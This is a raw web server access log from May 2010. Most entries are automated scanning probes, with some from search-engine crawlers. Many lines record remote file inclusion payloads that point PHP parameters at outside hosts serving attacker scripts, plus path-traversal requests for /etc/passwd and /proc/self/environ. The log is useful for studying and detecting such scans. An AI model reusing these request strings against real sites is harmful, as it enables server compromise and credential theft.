188.116.32.40 - - [02/May/2010:12:03:35 -0500] "GET /logs/access_log.1270684800//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
188.116.32.40 - - [02/May/2010:12:03:35 -0500] "GET //common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:03:50 -0500] "GET /logs/access_log.1219795200%20%20//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
67.218.116.133 - - [02/May/2010:12:04:38 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
164.77.228.200 - - [02/May/2010:12:04:56 -0500] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.intoy1004.co.kr/bbs/README.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
164.77.228.200 - - [02/May/2010:12:04:56 -0500] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.intoy1004.co.kr/bbs/README.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
81.167.65.30 - - [02/May/2010:12:05:23 -0500] "GET //common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:05:23 -0500] "GET /logs//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:05:23 -0500] "GET /logs/access_log.1270684800%20%20//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:06:02 -0500] "GET /logs/access_log.1270684800//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:06:02 -0500] "GET //common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:06:02 -0500] "GET /logs//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
216.129.119.40 - - [02/May/2010:12:06:24 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.132 - - [02/May/2010:12:07:00 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.204.181 - - [02/May/2010:12:07:25 -0500] "GET /logs/access_log.1177372800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.71.36 - - [02/May/2010:12:07:36 -0500] "GET /logs/access_log.1222214400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
81.167.65.30 - - [02/May/2010:12:07:47 -0500] "GET //common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:07:47 -0500] "GET /logs//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:07:47 -0500] "GET /logs/access_log.1270684800%20%20//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:08:54 -0500] "GET //common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:08:54 -0500] "GET /logs//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:08:54 -0500] "GET /logs/access_log.1219795200%20%20//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
207.46.199.53 - - [02/May/2010:12:08:55 -0500] "GET /logs/access_log.1199491200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.167.65.30 - - [02/May/2010:12:08:58 -0500] "GET //common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:08:58 -0500] "GET /logs//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:08:58 -0500] "GET /logs/access_log.1270684800//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
188.116.32.40 - - [02/May/2010:12:10:05 -0500] "GET /logs/access_log.1270684800%20%20//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
188.116.32.40 - - [02/May/2010:12:10:05 -0500] "GET /logs//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
188.116.32.40 - - [02/May/2010:12:10:05 -0500] "GET //common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
75.120.58.176 - - [02/May/2010:12:10:47 -0500] "GET /logs/access_log.1268611200//errors.php?error=http://www.wtsmith.co.uk/media/id.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.831"
75.120.58.176 - - [02/May/2010:12:10:48 -0500] "GET //errors.php?error=http://www.wtsmith.co.uk/media/id.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.831"
75.120.58.176 - - [02/May/2010:12:10:48 -0500] "GET /logs//errors.php?error=http://www.wtsmith.co.uk/media/id.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.831"
188.116.32.40 - - [02/May/2010:12:11:43 -0500] "GET //common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
188.116.32.40 - - [02/May/2010:12:11:43 -0500] "GET /logs//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
188.116.32.40 - - [02/May/2010:12:11:43 -0500] "GET /logs/access_log.1263081600//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
188.116.32.40 - - [02/May/2010:12:11:43 -0500] "GET /logs/access_log.1266537600//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
67.218.116.162 - - [02/May/2010:12:12:12 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
81.167.65.30 - - [02/May/2010:12:12:57 -0500] "GET //common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:12:57 -0500] "GET /logs//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:12:57 -0500] "GET /logs/access_log.1263081600//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:12:57 -0500] "GET /logs/access_log.1266537600//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
216.129.119.42 - - [02/May/2010:12:13:49 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
188.116.32.40 - - [02/May/2010:12:15:15 -0500] "GET /logs//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
188.116.32.40 - - [02/May/2010:12:15:15 -0500] "GET //common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
188.116.32.40 - - [02/May/2010:12:15:15 -0500] "GET /logs/access_log.1265241600//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
188.116.32.40 - - [02/May/2010:12:15:51 -0500] "GET /logs/access_log.1265932800//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:16:40 -0500] "GET /logs//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:16:40 -0500] "GET //common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:16:40 -0500] "GET /logs/access_log.1265241600//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.78.118.123 - - [02/May/2010:12:17:25 -0500] "GET /SSI.php?sourcedir=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 291 "-""Mozilla/5.0"
121.78.118.123 - - [02/May/2010:12:17:25 -0500] "GET /logs/access_log.1270512000%20%20/SSI.php?sourcedir=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.78.118.123 - - [02/May/2010:12:17:25 -0500] "GET /logs/SSI.php?sourcedir=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 296 "-""Mozilla/5.0"
121.78.118.123 - - [02/May/2010:12:17:45 -0500] "GET /logs/access_log.1223683200%20%20/SSI.php?sourcedir=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:17:50 -0500] "GET /logs//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:17:50 -0500] "GET //common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
67.195.112.180 - - [02/May/2010:12:17:58 -0500] "GET /logs/access_log.1193961600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
81.167.65.30 - - [02/May/2010:12:18:28 -0500] "GET /logs/access_log.1219795200//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
87.250.255.243 - - [02/May/2010:12:18:52 -0500] "GET /artwork/trunks.htm HTTP/1.1" 200 1275 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [02/May/2010:12:18:53 -0500] "GET /logs/access_log.1237507200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
81.167.65.30 - - [02/May/2010:12:19:05 -0500] "GET /logs/access_log.1265932800//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.78.118.123 - - [02/May/2010:12:19:45 -0500] "GET /logs/access_log.1270512000%20%20/SSI.php?sourcedir=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.78.118.123 - - [02/May/2010:12:19:45 -0500] "GET /SSI.php?sourcedir=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 291 "-""Mozilla/5.0"
121.78.118.123 - - [02/May/2010:12:19:45 -0500] "GET /logs/SSI.php?sourcedir=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 296 "-""Mozilla/5.0"
121.78.118.123 - - [02/May/2010:12:20:05 -0500] "GET /logs/access_log.1223683200%20%20/SSI.php?sourcedir=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.129.119.13 - - [02/May/2010:12:20:38 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.12 - - [02/May/2010:12:21:00 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
208.115.111.248 - - [02/May/2010:12:22:05 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
202.72.242.242 - - [02/May/2010:12:22:08 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://golfblaster3d.ru/includes/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
202.72.242.242 - - [02/May/2010:12:22:08 -0500] "GET /logs/access_log.1270598400%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://golfblaster3d.ru/includes/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
202.72.242.242 - - [02/May/2010:12:22:08 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://golfblaster3d.ru/includes/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
75.120.58.176 - - [02/May/2010:12:22:16 -0500] "GET /logs/access_log.1270857600//errors.php?error=http://www.wtsmith.co.uk/media/id.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.831"
79.165.161.30 - - [02/May/2010:12:23:18 -0500] "GET /logs/access_log.1212710400 HTTP/1.1" 404 310 "http://yandex.ru/yandsearch?text=http%3A%2F%2Fru.W*H.com%2F%3Fobject%3D191553&lr=213""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 MRA 5.5 (build 02842) Firefox/3.6.3"
79.165.161.30 - - [02/May/2010:12:23:19 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 MRA 5.5 (build 02842) Firefox/3.6.3"
79.165.161.30 - - [02/May/2010:12:23:22 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 MRA 5.5 (build 02842) Firefox/3.6.3"
67.218.116.165 - - [02/May/2010:12:25:08 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.13.89 - - [02/May/2010:12:25:55 -0500] "GET /costume/thmb6.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [02/May/2010:12:27:13 -0500] "GET /logs/access_log.1227398400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
188.116.32.40 - - [02/May/2010:12:28:16 -0500] "GET /logs/access_log.1263081600//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
188.116.32.40 - - [02/May/2010:12:28:16 -0500] "GET /logs//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
188.116.32.40 - - [02/May/2010:12:28:16 -0500] "GET //common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
78.110.50.119 - - [02/May/2010:12:28:21 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.manosdelalma.cl/help/ts???? HTTP/1.1" 200 3998 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
78.110.50.119 - - [02/May/2010:12:28:21 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.manosdelalma.cl/help/ts???? HTTP/1.1" 200 1003 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
216.129.119.13 - - [02/May/2010:12:28:46 -0500] "GET /logs/access_log.1249776000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.165 - - [02/May/2010:12:28:52 -0500] "GET /logs/access_log.1214611200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.11 - - [02/May/2010:12:29:13 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
81.167.65.30 - - [02/May/2010:12:30:16 -0500] "GET /logs/access_log.1263081600//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:30:16 -0500] "GET //common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:30:16 -0500] "GET /logs//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:31:15 -0500] "GET //common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:31:15 -0500] "GET /logs/access_log.1270684800%20%20//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:31:20 -0500] "GET /logs//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:32:49 -0500] "GET //common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:32:49 -0500] "GET /logs//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:32:49 -0500] "GET /logs/access_log.1270684800//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:33:16 -0500] "GET //common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:33:16 -0500] "GET /logs//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:33:16 -0500] "GET /logs/access_log.1266710400//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
87.250.255.243 - - [02/May/2010:12:35:12 -0500] "GET /artwork/ HTTP/1.1" 200 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.136 - - [02/May/2010:12:35:55 -0500] "GET /logs/access_log.1246233600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.93.138.214 - - [02/May/2010:12:41:14 -0500] "GET /logs/%22*/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=%22' HTTP/1.1" 404 321 "-""libwww-perl/5.831"
81.93.138.214 - - [02/May/2010:12:41:14 -0500] "GET /%22*/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=%22' HTTP/1.1" 404 316 "-""libwww-perl/5.831"
206.212.244.82 - - [02/May/2010:12:42:16 -0500] "GET ///adminhead.php?path[docroot]=Babat%20Wae%20CoX.... HTTP/1.1" 404 299 "-""libwww-perl/5.831"
121.190.102.21 - - [02/May/2010:12:44:00 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:12:44:00 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:12:44:00 -0500] "GET /logs/access_log.1268956800%20%20//Neos_Chronos/header.php?base_folder=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
206.212.244.82 - - [02/May/2010:12:45:38 -0500] "GET /logs/access_log.1270598400///adminhead.php?path[docroot]=Babat%20Wae%20CoX.... HTTP/1.1" 404 326 "-""libwww-perl/5.831"
206.212.244.82 - - [02/May/2010:12:45:38 -0500] "GET ///adminhead.php?path[docroot]=Babat%20Wae%20CoX.... HTTP/1.1" 404 299 "-""libwww-perl/5.831"
206.212.244.82 - - [02/May/2010:12:45:38 -0500] "GET /logs///adminhead.php?path[docroot]=Babat%20Wae%20CoX.... HTTP/1.1" 404 304 "-""libwww-perl/5.831"
81.167.65.30 - - [02/May/2010:12:45:51 -0500] "GET /logs//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:45:51 -0500] "GET //common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:12:45:51 -0500] "GET /logs/access_log.1270684800%20%20//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:12:48:21 -0500] "GET /logs/access_log.1268956800//Neos_Chronos/header.php?base_folder=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:12:48:21 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:12:48:21 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:12:56:51 -0500] "GET /logs/access_log.1268956800%20%20//Neos_Chronos/header.php?base_folder=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
208.115.111.248 - - [02/May/2010:12:57:36 -0500] "GET /logs/access_log.1218153600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [02/May/2010:12:57:38 -0500] "GET /logs/access_log.1223251200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [02/May/2010:12:57:40 -0500] "GET /logs/access_log.1239926400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [02/May/2010:12:57:43 -0500] "GET /logs/access_log.1247529600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
207.46.13.53 - - [02/May/2010:12:57:55 -0500] "GET /logs/access_log.1212537600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
206.212.244.82 - - [02/May/2010:12:58:25 -0500] "GET /logs/access_log.1227484800///adminhead.php?path[docroot]=Babat%20Wae%20CoX.... HTTP/1.1" 404 326 "-""libwww-perl/5.831"
211.174.185.131 - - [02/May/2010:13:01:48 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
211.174.185.131 - - [02/May/2010:13:01:48 -0500] "GET /logs/access_log.1270684800%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
211.174.185.131 - - [02/May/2010:13:01:48 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
87.250.255.243 - - [02/May/2010:13:04:22 -0500] "GET /logs/access_log.1270771200 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
212.175.146.45 - - [02/May/2010:13:04:41 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.76"
212.175.146.45 - - [02/May/2010:13:04:42 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.76"
81.89.97.190 - - [02/May/2010:13:06:57 -0500] "GET /logs/access_log.1270684800/db.php?path_local=http://195.130.126.109/SQLiteManager/ide.txt???? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
81.89.97.190 - - [02/May/2010:13:06:57 -0500] "GET /logs/db.php?path_local=http://195.130.126.109/SQLiteManager/ide.txt???? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
81.89.97.190 - - [02/May/2010:13:06:57 -0500] "GET /db.php?path_local=http://195.130.126.109/SQLiteManager/ide.txt???? HTTP/1.1" 404 290 "-""libwww-perl/5.805"
81.89.97.190 - - [02/May/2010:13:07:13 -0500] "GET /logs/access_log.1268956800/db.php?path_local=http://195.130.126.109/SQLiteManager/ide.txt???? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
213.175.223.80 - - [02/May/2010:13:10:06 -0500] "GET /logs//index.php?basedir=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
213.175.223.80 - - [02/May/2010:13:10:06 -0500] "GET //index.php?basedir=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
216.129.119.10 - - [02/May/2010:13:10:15 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
195.160.224.208 - - [02/May/2010:13:10:21 -0500] "GET /logs//index.php?basedir=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.160.224.208 - - [02/May/2010:13:10:21 -0500] "GET //index.php?basedir=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
83.103.70.86 - - [02/May/2010:13:11:03 -0500] "GET /logs//index.php?basedir=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
83.103.70.86 - - [02/May/2010:13:11:03 -0500] "GET //index.php?basedir=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
